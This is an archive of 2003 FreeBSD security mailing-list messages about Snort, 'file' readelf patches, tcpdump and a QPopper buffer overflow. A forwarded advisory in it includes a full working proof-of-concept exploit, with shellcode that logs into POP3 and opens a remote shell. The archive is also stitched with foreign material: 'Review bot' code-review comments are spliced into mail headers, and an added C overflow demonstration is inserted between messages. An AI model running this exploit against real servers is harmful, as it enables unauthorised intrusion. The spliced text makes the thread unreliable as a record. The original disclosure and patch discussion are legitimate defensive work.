From owner-freebsd-security Mon Mar 10 0:14:41 2003
Date: Mon, 10 Mar 2003 01:17:36 -0700
From: Duncan Patton a Campbell
To: freebsd-security@FreeBSD.ORG
Subject: Netweirdness
Message-Id: <20030310011736.7f780b5a.campbell@neotext.ca>
In-Reply-To: <200303061432.h26EWRaN005247@device.dyndns.org>
Organization: Index Express Ltd.

We had a strangeness turn up today that is related only indirectly to
FreeBSD (skip if this offends you).

We have five servers at three remote locations: three in Burnaby Can.
and two others in Sydney Aus. and Edmonton Can. The Burnaby boxes are
all on the same subnet. Routing in *one* direction from *one* box on the
Burnaby subnet to Australia (and only Aus!) was broken inside our ISP's
router. The problem just went away after I reported it.

So the question I have here is how bad is the average security on ISPs
and is there much that can be done at our end to prevent the service
from being hacked? Last week the modem went for a loop and forgot its
mind.
Thanks,

Dhu

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Mon Mar 10 7:50:48 2003
Date: Mon, 10 Mar 2003 07:50:43 -0800
From: David Olbersen
To: freebsd-security@freebsd.org
Subject: sendmail exploit in wild?
Message-ID: <20030310155043.GA86716@slickness.org>

I don't use sendmail but did get these two messages from postfix:

Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142] sent Message-ID: header instead of SMTP command: Message-ID: <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu>

Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142] sent Message-ID: header instead of SMTP command: Message-ID: <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu>

I know the sendmail exploit is in the headers, does this look like it?

--
David Olbersen
Site: http://mp3s.mootech.net
PGP Key: http://mootech.net/~dave/gpg-key.txt
One hoopy frood who knows where his towel is.

From owner-freebsd-security Mon Mar 10 8: 5: 0 2003
Date: Mon, 10 Mar 2003 10:04:56 -0600
From: "Jacques A. Vidrine"
To: David Olbersen
Cc: freebsd-security@freebsd.org
Subject: Re: sendmail exploit in wild?
Message-ID: <20030310160456.GB3720@madman.celabo.org>
In-Reply-To: <20030310155043.GA86716@slickness.org>

On Mon, Mar 10, 2003 at 07:50:43AM -0800, David Olbersen wrote:
> I don't use sendmail but did get these two messages from postfix:
>
> Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142]
> sent Message-ID: header instead of SMTP command: Message-ID:
> <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu>
>
> Mar 9 22:47:58 bubbles postfix/smtpd[26116]: warning: unknown[62.56.175.142]
> sent Message-ID: header instead of SMTP command: Message-ID:
> <199b8142297b$b6bc9b9a$c2263fc2@hnayttbkseb.bu>
>
> I know the sendmail exploit is in the headers, does this look like it?

No. The (known) sendmail problem is to do with parsing addresses that
smell like `<><><><><><><><>' or similar.

Cheers,
--
Jacques A. Vidrine http://www.celabo.org/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Mon Mar 10 8:10:24 2003
Date: Mon, 10 Mar 2003 08:10:20 -0800
From: David Olbersen
To: "Jacques A. Vidrine"
Cc: freebsd-security@freebsd.org
Subject: Re: sendmail exploit in wild?
Message-ID: <20030310161020.GA92972@slickness.org>
In-Reply-To: <20030310160456.GB3720@madman.celabo.org>

Thus spake Jacques A. Vidrine (nectar@FreeBSD.org):
> No. The (known) sendmail problem is to do with parsing addresses that
> smell like `<><><><><><><><>' or similar.

Right. Thanks then!

--
David Olbersen
Site: http://mp3s.mootech.net
PGP Key: http://mootech.net/~dave/gpg-key.txt
One hoopy frood who knows where his towel is.

From owner-freebsd-security Mon Mar 10 8:16:50 2003
From: "Michael L. Squires"
Message-Id: <200303101616.h2AGGjcS010643@siralan.org>
Subject: Snort 1.9.0 exploit
To: freebsd-security@freebsd.org
Date: Mon, 10 Mar 2003 11:16:44 -0500 (EST)

I got a message from SANS that the version of Snort that was part of
4.8-RC2, at least (1.8 through 1.9.0 and 2.0 beta) has a buffer
overflow problem that could be used to gain root access.

The quick fix is to disable the RPC preprocessor by commenting out the
line "preprocessor rpc_decode" in snort.conf.

See www.snort.org for more info.

Mike Squires

From owner-freebsd-security Mon Mar 10 8:36:19 2003
Date: Mon, 10 Mar 2003 18:34:44 +0200
From: Peter Pentchev
To: "Michael L. Squires"
Cc: freebsd-security@freebsd.org
Subject: Re: Snort 1.9.0 exploit
Message-ID: <20030310163444.GM578@straylight.oblivion.bg>
In-Reply-To: <200303101616.h2AGGjcS010643@siralan.org>

On Mon, Mar 10, 2003 at 11:16:44AM -0500, Michael L. Squires wrote:
> I got a message from SANS that the version of Snort that was part of
> 4.8-RC2, at least (1.8 through 1.9.0 and 2.0 beta) has a buffer
> overflow problem that could be used to gain root access.
>
> The quick fix is to disable the RPC preprocessor by commenting out the
> line "preprocessor rpc_decode" in snort.conf.
>
> See www.snort.org for more info.

Kris Kennaway, the maintainer of the security/snort port, updated it
6 days ago to 1.9.1 in response to the ISS advisory.

G'luck,
Peter

--
Peter Pentchev roam@ringlet.net roam@sbnd.net roam@FreeBSD.org
PGP key: http://people.FreeBSD.org/~roam/roam.key.asc
Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553
If the meanings of 'true' and 'false' were switched, then this sentence wouldn't be false.

From owner-freebsd-security Tue Mar 11 9:34:34 2003
Message-Id: <5.2.0.9.2.20030311113159.0386fea0@localhost>
Date: Tue, 11 Mar 2003 11:34:40 -0600
To: "Jacques A. Vidrine", Guy Poizat
From: Christopher Schulte
Subject: Re: Prov. patch for the file hole ISS disclosed
Cc: freebsd-security@FreeBSD.ORG, obrien@FreeBSD.ORG
In-Reply-To: <20030306154138.GA33430@madman.celabo.org>

At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote:
>Thanks! However, this has already been fixed in -CURRENT (by import
>of FILE 3.41). I do not know whether or not David plans to MFC in
>time for 4.8-RELEASE.

I think this should be merged into the security branches,
due to possible remote exploit by third party programs that
use file, such as (at the very least) amavis.

>Cheers,
>--
>Jacques A. Vidrine http://www.celabo.org/
>NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
>jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

--
Christopher Schulte
http://www.schulte.org/
Do not un-munge my @nospam.schulte.org email address.
This address is valid.

From owner-freebsd-security Tue Mar 11 9:41:31 2003
Date: Tue, 11 Mar 2003 11:41:27 -0600
From: "Jacques A. Vidrine"
To: Christopher Schulte
Cc: Guy Poizat, freebsd-security@FreeBSD.ORG, obrien@FreeBSD.ORG
Subject: Re: Prov. patch for the file hole ISS disclosed
Message-ID: <20030311174126.GA57179@madman.celabo.org>
In-Reply-To: <5.2.0.9.2.20030311113159.0386fea0@localhost>

On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote:
> At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote:
> >Thanks! However, this has already been fixed in -CURRENT (by import
> >of FILE 3.41). I do not know whether or not David plans to MFC in
> >time for 4.8-RELEASE.
>
> I think this should be merged into the security branches,
> due to possible remote exploit by third party programs that
> use file, such as (at the very least) amavis.

I tend to agree.

David?

Cheers,
--
Jacques A. Vidrine http://www.celabo.org/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Tue Mar 11 9:52: 8 2003
Date: Tue, 11 Mar 2003 11:52:15 -0600
From: Stephen Hilton To: "Jacques A. Vidrine" Cc: , Subject: Re: Prov. patch for the file hole ISS disclosed Message-Id: <20030311115215.1628a67b.nospam@hiltonbsd.com> In-Reply-To: <20030311174126.GA57179@madman.celabo.org> References: <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> X-Mailer: Sylpheed version 0.8.10 (GTK+ 1.2.10; i386-portbld-freebsd4.8) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, 11 Mar 2003 11:41:27 -0600 "Jacques A. Vidrine" wrote: > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote: > > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote: > > >Thanks! However, this has already been fixed in -CURRENT (by import > > >of FILE 3.41). I do not know whether or not David plans to MFC in > > >time for 4.8-RELEASE. > > > > I think this should be merged into the security branches, > > due to possible remote exploit by third party programs that > > use file, such as (at the very least) amavis. > > I tend to agree. > > David? > I am getting ready to do a buildworld today on 4.8-RC and can test a patch if available. Does the patch provided by: Guy Poizat Appear correct ? --------------------------------------------------------------- --- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000 +++ src/contrib/file/readelf.c.patched Thu Mar 6 15:02:44 2003 
@@ -141,6 +141,9 @@ Elf32_Shdr sh32; Elf64_Shdr sh64; + if ( size > ( class == ELFCLASS32 ? sizeof(Elf32_Shdr) : sizeof(Elf64_Shdr) ) ) + return; + if (lseek(fd, off, SEEK_SET) == -1) error("lseek failed (%s).\n", strerror(errno)); ---------------------------------------------------------------- Thanks in advance, Stephen Hilton nospam@hiltonbsd.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 10: 0:40 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AEDE037B401 for ; Tue, 11 Mar 2003 10:00:37 -0800 (PST) Received: from pol.dyndns.org (pol.net1.nerim.net [80.65.225.93]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4A82D43F75 for ; Tue, 11 Mar 2003 10:00:33 -0800 (PST) (envelope-from guy@device.dyndns.org) Received: from oemcomputer.device.dyndns.org (partserver.pol.local [172.16.10.10]) by pol.dyndns.org (8.12.6/8.12.6) with ESMTP id h2BI0DM4015218 for ; Tue, 11 Mar 2003 19:00:17 +0100 (CET) Message-Id: <5.1.1.6.0.20030311185258.04022810@device.dyndns.org> X-Sender: guy@device.dyndns.org X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 11 Mar 2003 18:59:47 +0100 To: freebsd-security@FreeBSD.ORG 
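Review bot: the added check in the @@ -141,6 +141,9 @@ hunk of the patch quoted above only rejects a `size` larger than the section-header struct, so a `size` smaller than the struct is still accepted and the header is then only partly filled before its type field is examined. Comparing for equality with the struct size of the current ELF class would close that case. The bare `return;` also discards the malformed file silently, where the neighbouring `lseek` failure reports through `error(...)`; reporting the bad size the same way would make the rejection visible to whoever is scanning the file.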
From: "Guy P."
Subject: Re: Prov. patch for the file hole ISS disclosed
In-Reply-To: <20030311174126.GA57179@madman.celabo.org>

At 18:41 11/03/2003, Jacques A. Vidrine wrote:
>On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote:
> > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote:
> > >Thanks! However, this has already been fixed in -CURRENT (by import
> > >of FILE 3.41). I do not know whether or not David plans to MFC in
> > >time for 4.8-RELEASE.
> >
> > I think this should be merged into the security branches,
> > due to possible remote exploit by third party programs that
> > use file, such as (at the very least) amavis.
>
>I tend to agree.
>
>David?

FYI, amavis people just released an SA where they state "We expect that
all distributors of free UNIX(R)-like operating systems will address the
issue shortly."
See http://marc.theaimsgroup.com/?l=amavis-user&m=104740298431088&w=2

Also wanted to mention that amavis provides a way to run its processes
as a non-root user, but it takes some work to achieve, so we can expect
some people will have "delayed" doing so (just as I did until I realized
what implications it had :] )

--
G.P.

From owner-freebsd-security Tue Mar 11 10:15:15 2003
Date: Tue, 11 Mar 2003 10:14:52 -0800
From: "David O'Brien"
To: "Jacques A. Vidrine", Christopher Schulte, Guy Poizat, freebsd-security@FreeBSD.org
Subject: Re: Prov. patch for the file hole ISS disclosed
Message-ID: <20030311181452.GA59655@dragon.nuxi.com>
Reply-To: obrien@FreeBSD.org
In-Reply-To: <20030311174126.GA57179@madman.celabo.org>
Organization: The NUXI BSD Group

On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote:
> On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote:
> > At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote:
> > >Thanks! However, this has already been fixed in -CURRENT (by import
> > >of FILE 3.41). I do not know whether or not David plans to MFC in
> > >time for 4.8-RELEASE.
> >
> > I think this should be merged into the security branches,
> > due to possible remote exploit by third party programs that
> > use file, such as (at the very least) amavis.
>
> I tend to agree.
>
> David?

Up to you. I'm going to do an MFC for 4.8. I am not very well setup to
test the security branches. Do you want me to just MFC exactly what I
committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for
the 4_7 branch.

From owner-freebsd-security Tue Mar 11 10:22:12 2003
Date: Tue, 11 Mar 2003 12:22:05 -0600
From: "Jacques A. Vidrine"
To: David O'Brien
Cc: Christopher Schulte, Guy Poizat, freebsd-security@FreeBSD.org
Subject: Re: Prov. patch for the file hole ISS disclosed
Message-ID: <20030311182205.GA57362@madman.celabo.org>
In-Reply-To: <20030311181452.GA59655@dragon.nuxi.com>

On Tue, Mar 11, 2003 at 10:14:52AM -0800, David O'Brien wrote:
> On Tue, Mar 11, 2003 at 11:41:27AM -0600, Jacques A. Vidrine wrote:
> > On Tue, Mar 11, 2003 at 11:34:40AM -0600, Christopher Schulte wrote:
> > > I think this should be merged into the security branches,
> > > due to possible remote exploit by third party programs that
> > > use file, such as (at the very least) amavis.
> >
> > I tend to agree.
> >
> > David?
>
> Up to you. I'm going to do an MFC for 4.8.

Good, thanks!

> I am not very well setup to
> test the security branches.

Oops, I didn't read very carefully. I was talking about -STABLE only.

> Do you want me to just MFC exactly what I
> committed to 5-CURRENT to the 5_0 branch (it should Just Work). Same for
> the 4_7 branch.

No, I do not wish the new `file' to be merged into the security
branches.

Cheers,
--
Jacques A. Vidrine http://www.celabo.org/
NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se

From owner-freebsd-security Tue Mar 11 10:24:30 2003
Message-Id: <5.1.1.6.0.20030311190645.02f316c8@device.dyndns.org>
Date: Tue, 11 Mar 2003 19:24:03 +0100
From: "Guy P." Subject: Re: Prov. patch for the file hole ISS disclosed In-Reply-To: <20030311115215.1628a67b.nospam@hiltonbsd.com> References: <20030311174126.GA57179@madman.celabo.org> <200303061415.h26EFlhD004317@device.dyndns.org> <200303061415.h26EFlhD004317@device.dyndns.org> <5.2.0.9.2.20030311113159.0386fea0@localhost> <20030311174126.GA57179@madman.celabo.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 18:52 11/03/2003, Stephen Hilton wrote: >I am getting ready to do a buildworld today on 4.8-RC and can >test a patch if available. Does the patch provided by: > >Guy Poizat > >Appear correct ? After investigating what the file utility mainteners used in their fixed release, i'd suggest using the following patch instead, which looks more respectful regarding the original code to my eyes : --------------------------------------------------------------- --- src/contrib/file/readelf.c Sun Nov 26 22:37:21 2000 +++ src/contrib/file/readelf.c.patched Mon Mar 10 15:30:59 2003 @@ -104,6 +104,9 @@ #define shs_type (class == ELFCLASS32 \ ? getu32(swap, sh32.sh_type) \ : getu32(swap, sh64.sh_type)) +#define sh_size (class == ELFCLASS32 \ + ? sizeof sh32 \ + : sizeof sh64) #define ph_addr (class == ELFCLASS32 \ ? (void *) &ph32 \ : (void *) &ph64) 
@@ -141,11 +144,14 @@ Elf32_Shdr sh32; Elf64_Shdr sh64; + if (size != sh_size) + error("corrupted section header size.\n"); + if (lseek(fd, off, SEEK_SET) == -1) error("lseek failed (%s).\n", strerror(errno)); for ( ; num; num--) { - if (read(fd, sh_addr, size) == -1) + if (read(fd, sh_addr, sh_size) == -1) error("read failed (%s).\n", strerror(errno)); if (shs_type == SHT_SYMTAB /* || shs_type == SHT_DYNSYM */) { (void) printf (", not stripped"); --------------------------------------------------------------- Forgive my terrible english... -- Guy P. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 11 13:28:25 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E283137B401 for ; Tue, 11 Mar 2003 13:28:18 -0800 (PST) Received: from users.munk.nu (213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8499643FAF for ; Tue, 11 Mar 2003 13:28:17 -0800 (PST) (envelope-from munk@users.munk.nu) Received: from users.munk.nu (munk@213-152-51-194.dsl.eclipse.net.uk [213.152.51.194]) by users.munk.nu (8.12.6/8.12.7) with ESMTP id h2BLSoML031329 for ; Tue, 11 Mar 2003 21:28:50 GMT (envelope-from munk@users.munk.nu) Received: (from munk@localhost) by users.munk.nu (8.12.6/8.12.6/Submit) id h2BLSnZP031328 for freebsd-security@freebsd.org; Tue, 11 Mar 2003 21:28:49 GMT Date: Tue, 11 Mar 2003 21:28:48 +0000 
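Review bot: the `sh_size` macro added in the @@ -104,6 +104,9 @@ hunk of the patch above has the same name as the `sh_size` member of `Elf32_Shdr` and `Elf64_Shdr`, so any later `sh32.sh_size` or `sh64.sh_size` in this file would be rewritten by the preprocessor into the `sizeof` expression. A macro name that cannot collide with a struct field, for example `shdr_bytes` (a hypothetical name), keeps the member usable.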
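Review bot: in the @@ -141,11 +144,14 @@ hunk of the patch above, `read(fd, sh_addr, sh_size) == -1` still treats a short read as success, so a file truncated inside the section header table leaves `sh32`/`sh64` holding stale or unset bytes when `shs_type` is evaluated. Comparing the return value against the expected length, not only against -1, would cover that case. The `size != sh_size` test sits in the right place, ahead of the `lseek`, and its message could include the rejected value to help whoever triages the file.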
From: Jez Hancock
To: FreeBSD Security List
Subject: [heinz@cronon-ag.de: QPopper 4.0.x buffer overflow vulnerability]

Hi,

Can anyone confirm whether or not the attached vulnerability applies to the qpopper 4.0.4-1 port?

TIA,
Jez

Date: Mon, 10 Mar 2003 15:31:34 +0100
From: Florian Heinz
To: bugtraq@securityfocus.com
Subject: QPopper 4.0.x buffer overflow vulnerability

Hello,

Under certain conditions it is possible to execute arbitrary code using a buffer overflow in the recent qpopper. You need a valid username/password-combination and code is (depending on the setup) usually executed with the user's uid and gid mail.

Explanation:
Qualcomm provides their own vsnprintf-implementation Qvsnprintf(). This function is used unconditionally on any system, regardless if the system has its own vsnprintf(). The function correctly writes up to 'n' bytes into the buffer, but fails to null-terminate it, if buffer-space runs out while copying the format-string (so the obvious fix is, null-terminate the buffer in Qvsnprintf()). This is a problem in pop_msg() (popper/pop_msg.c). The call to Qvsnprintf() can leave the buffer 'message' unterminated, so the successive call to strcat (strcat(message,"\r\n")) writes somewhere into the stack. What it exactly overwrites depends heavily on the individual binary and the current stack-data (where is the next null-byte).

I successfully managed to execute arbitrary code using the 'mdef'-command with the binary in the most recent debian-package 'qpopper-4.0.4-8'

Sending 'mdef ()' with a macro-name of about 1000 bytes fills the buffer leaving it unterminated. The strcat overwrites the least significant byte of the saved basepointer on the stack, now pointing inside the buffer. On return of pop_mdef() (file pop_extend.c), the return-address is now fetched from within our buffer (and of course pointing inside our buffer), allowing to, for example, spawn a shell. The Macroname may not include bytes causing isspace() to return true and, of course, no null-byte, so shellcode must be appropriately crafted.

I have tested the qpopper from SuSE 8.1 too, the flaw exists too, but SuSE is more lucky, strcat doesn't overwrite critical values. I have not yet tested other distributions. Here is a POC-exploit, Values for RETADDR and BUFSIZE adjusted for debian qpopper-4.0.4-8: -- snip -- #include #include #include #include #include #include #include #include char *sc = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x08\x40" "\x40\x40\xcd\x80"; #define BUFLEN 1006 #define RETLEN 148 #define RETADDR 0xbfffd304 int main (int argc, char **argv) { int fd, len, i, retaddr = RETADDR; char *bp, buf[2000]; struct sockaddr_in peer; fd_set fs; if (argc != 4) { fprintf(stderr, "Usage: %s \n\n", argv[0]); exit(EXIT_FAILURE); } peer.sin_family = AF_INET; peer.sin_port = htons(110); peer.sin_addr.s_addr = inet_addr(argv[1]); fd = socket(AF_INET, SOCK_STREAM, 0); if (connect(fd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) { perror("connect"); exit(EXIT_FAILURE); } snprintf(buf, 1024, "USER %s\n", argv[2]); write(fd, buf, strlen(buf)); snprintf(buf, 1024, "PASS %s\n", argv[3]); write(fd, buf, strlen(buf)); memset(buf, 0x90, 2000); memcpy(buf, "mdef ", 5); memcpy(buf + BUFLEN - RETLEN - strlen(sc), sc, strlen(sc)); bp = (char *) (((unsigned int)(buf + BUFLEN - RETLEN)) & 0xfffffffc); for (i = 0; i < RETLEN; i += 4) memcpy(bp+i+2, &retaddr, sizeof(int)); buf[BUFLEN-2] = '('; buf[BUFLEN-1] = ')'; buf[BUFLEN] = '\n'; write(fd, buf, BUFLEN+1); while (1) { FD_ZERO(&fs); FD_SET(0, &fs); FD_SET(fd, &fs); select(fd+1, &fs, NULL, NULL, NULL); if (FD_ISSET(0, &fs)) { if ((len = read(0, buf, 1000)) <= 0) break; write(fd, buf, len); } else { if ((len = read(fd, buf, 1000)) <= 0) break; write(1, buf, len); } } exit(EXIT_SUCCESS); } -- snap -- This is the short version. 
An enhanced version with error-checking, bufsize- and return-address autodetection can be found on http://nstx.dereference.de/snippets/qex.c

Feedback is welcome.

regards,

Florian Heinz
Cronon AG
http://www.cronon.org

PS: sorry for the bad English ;)

From owner-freebsd-security Tue Mar 11 15:13:30 2003
Date: Tue, 11 Mar 2003 15:13:26 -0800 (PST)
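The failure mode described in Florian Heinz's advisory above (a bounded formatter that omits the terminator on truncation, followed by strcat), shown as an added example that is not part of any message in this thread and not Qualcomm's code. The names fmt_bounded, append_crlf_checked and guard_bytes_changed, the buffer sizes, the 3-byte reserve and the reply text are assumptions made for illustration; the overrun is confined to a single local array.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define MSG_LEN   32  /* logical size of the reply buffer ('message' in the advisory) */
#define GUARD_LEN 16  /* bytes after it, standing in for neighbouring stack data */
#define GUARD_RUN 4   /* non-zero guard bytes before the next NUL */

/* Bounded formatter. always_terminate=0 models the flaw described in the
 * advisory (fills n bytes, no NUL when space runs out); =1 is the fixed
 * behaviour. A model written for this example, not Qualcomm's code. */
static size_t fmt_bounded(int always_terminate, char *buf, size_t n,
                          const char *fmt, ...)
{
    char tmp[256];
    va_list ap;
    int len;
    size_t want, room;

    if (n == 0)
        return 0;
    va_start(ap, fmt);
    len = vsnprintf(tmp, sizeof tmp, fmt, ap);
    va_end(ap);
    if (len < 0)
        len = 0;
    want = (size_t)len < sizeof tmp ? (size_t)len : sizeof tmp - 1;
    room = always_terminate ? n - 1 : n;
    if (want > room)
        want = room;
    memcpy(buf, tmp, want);
    if (want < n)
        buf[want] = '\0';      /* flawed mode: skipped when want == n */
    return want;
}

/* Defensive caller: append CRLF only if buf holds a terminated string
 * with room for two more characters and the terminator. */
static int append_crlf_checked(char *buf, size_t size)
{
    char *end = memchr(buf, '\0', size);

    if (end == NULL || (size_t)(end - buf) + 3 > size)
        return -1;
    memcpy(end, "\r\n", 3);
    return 0;
}

/* Replays the caller pattern from the advisory inside one array, so the
 * overrun is observable but never leaves memory this example owns.
 * Returns how many guard bytes changed; *rc gets the checked-append result. */
static int guard_bytes_changed(int fixed_formatter, int checked_append,
                               size_t name_len, int *rc)
{
    char arena[MSG_LEN + GUARD_LEN];
    char name[128];
    int i, changed = 0;

    memset(arena, 'S', MSG_LEN);             /* stale, non-zero buffer contents */
    memset(arena + MSG_LEN, 0, GUARD_LEN);
    memset(arena + MSG_LEN, 'G', GUARD_RUN); /* next NUL lies past the buffer */

    if (name_len >= sizeof name)
        name_len = sizeof name - 1;
    memset(name, 'A', name_len);             /* constructed macro name */
    name[name_len] = '\0';

    /* Assumption: the caller reserves 3 bytes for "\r\n" and the NUL. */
    fmt_bounded(fixed_formatter, arena, MSG_LEN - 3,
                "-ERR unknown macro %s", name);

    *rc = 0;
    if (checked_append)
        *rc = append_crlf_checked(arena, MSG_LEN);
    else
        strcat(arena, "\r\n");               /* the call named in the advisory */

    for (i = 0; i < GUARD_LEN; i++)
        if (arena[MSG_LEN + i] != (i < GUARD_RUN ? 'G' : '\0'))
            changed++;
    return changed;
}

int main(void)
{
    int rc, n;

    n = guard_bytes_changed(0, 0, 100, &rc);
    printf("flawed formatter, strcat:         %d guard bytes changed\n", n);
    n = guard_bytes_changed(1, 0, 100, &rc);
    printf("fixed formatter, strcat:          %d guard bytes changed\n", n);
    n = guard_bytes_changed(0, 1, 100, &rc);
    printf("flawed formatter, checked append: %d changed, append returned %d\n",
           n, rc);
    return 0;
}
```

With the flawed formatter the CRLF lands at the first NUL beyond the buffer, which is why the advisory says the damage depends on the stack contents of each binary; either the terminating formatter or the checked append alone keeps the write inside the buffer.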
From: twig les
Subject: another TCPDump update question
To: freebsd-security@freebsd.org

Hey all, I'd really like to update tcpdump on my live boxes (since that is their primary function) and I'm thinking of simply installing the new version from source and linking it over the existing binary. I did this on a lab box and found no problems, however I may be missing something.

The reason I can't do the "correct" thing and upgrade the base system is that these are live boxes in a remote facility (different state).

The reason this ties into freebsd-security and not -questions is I'm still waiting for official word on a patch/upgrade procedure from the team. Am I being impatient here or did I miss something? I checked back over security-notifications and saw nothing.

To illustrate what I did:

L# find / -name tcpdump
/usr/local/sbin/tcpdump
/usr/local/tcpdump-3.7.2/tcpdump
/usr/sbin/tcpdump
...
L# rm /usr/sbin/tcpdump
L# ln -s /usr/local/sbin/tcpdump /usr/sbin/tcpdump
L# tcpdump -V
tcpdump version 3.7.2

=====
-----------------------------------------------------------
Know yourself and know your enemy and you will never fear defeat.
-----------------------------------------------------------

From owner-freebsd-security Tue Mar 11 16:18:40 2003
Date: Tue, 11 Mar 2003 17:18:04 -0700
To: Jez Hancock , FreeBSD Security List
From: Brett Glass
Subject: Re: [heinz@cronon-ag.de: QPopper 4.0.x buffer overflow vulnerability]

At 02:28 PM 3/11/2003, Jez Hancock wrote:
>Hi,
>
>Can anyone confirm whether or not the attached vulnerability applies to
>the qpopper 4.0.4-1 port?

My guess is it does. The only mitigating factor is that the attacker has to supply a valid user ID and password, which means that the attack has to be an inside job.

Any word regarding patches from Qualcomm?

--Brett

From owner-freebsd-security Tue Mar 11 19:12:52 2003
Date: Tue, 11 Mar 2003 22:17:58 -0500
To: security@freebsd.org
From: Mike Tancsa
Subject: Fwd: Qpopper 4.0.5fc2 available

FYI

>Date: Tue, 11 Mar 2003 18:42:04 -0800
>To: Qpopper Public List ,
> qpopper-announce@rohan.qualcomm.com
>From: Randall Gellens
>Subject: Qpopper 4.0.5fc2 available
>
>Qpopper 4.0.5fc2 is available at
>.
>
>The full list of changes from one release to the next is on the FTP site,
>at .
>
>Changes from 4.0.4b2 to 4.0.5fc2:
>------------------------------
> 10. Fixed (non-root) buffer overflow.
>
>Please check this release out and let me know if you encounter any
>problems. I plan on releasing 4.0.5 tomorrow afternoon if no problem
>reports are received.
>--
>Randall Gellens
>Opinions are personal; facts are suspect; I speak for myself only
>-------------- Randomly-selected tag: ---------------
>Man is a rational animal who always loses his temper when he is
>called upon to act in accordance with the dictates of reason.
> --Oscar Wilde

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

From owner-freebsd-security Tue Mar 11 20:32:22 2003
Date: Wed, 12 Mar 2003 04:32:50 +0000
From: Jez Hancock
To: FreeBSD Security List
Subject: Re: [heinz@cronon-ag.de: QPopper 4.0.x buffer overflow vulnerability]

On Tue, Mar 11, 2003 at 05:18:04PM -0700, Brett Glass wrote:
> Any word regarding patches from Qualcomm?

Looks like this question was answered by someone else on the list :) All good.

Jez

From owner-freebsd-security Tue Mar 11 22: 7:43 2003
From: "Robert Herrold"
Subject: Re: Prov. patch for the file hole ISS disclosed
Date: Wed, 12 Mar 2003 00:05:40 -0600

Did I get this in the middle of a thread???? This is very important to our operation (since we run Amavis), and even after viewing the archives, it appears that it is starting with this thread.

Is there a patch for this? It appears that the patch is relevant to GUI, and we don't run Xwindows

TIA
Bob

----- Original Message -----
From: "Christopher Schulte"
To: "Jacques A. Vidrine" ; "Guy Poizat"
Sent: Tuesday, March 11, 2003 11:34 AM
Subject: Re: Prov. patch for the file hole ISS disclosed

> At 09:41 AM 3/6/2003 -0600, Jacques A. Vidrine wrote:
> >Thanks! However, this has already been fixed in -CURRENT (by import
> >of FILE 3.41). I do not know whether or not David plans to MFC in
> >time for 4.8-RELEASE.
>
> I think this should be merged into the security branches,
> due to possible remote exploit by third party programs that
> use file, such as (at the very least) amavis.
>
> >Cheers,
> >--
> >Jacques A. Vidrine http://www.celabo.org/
> >NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos
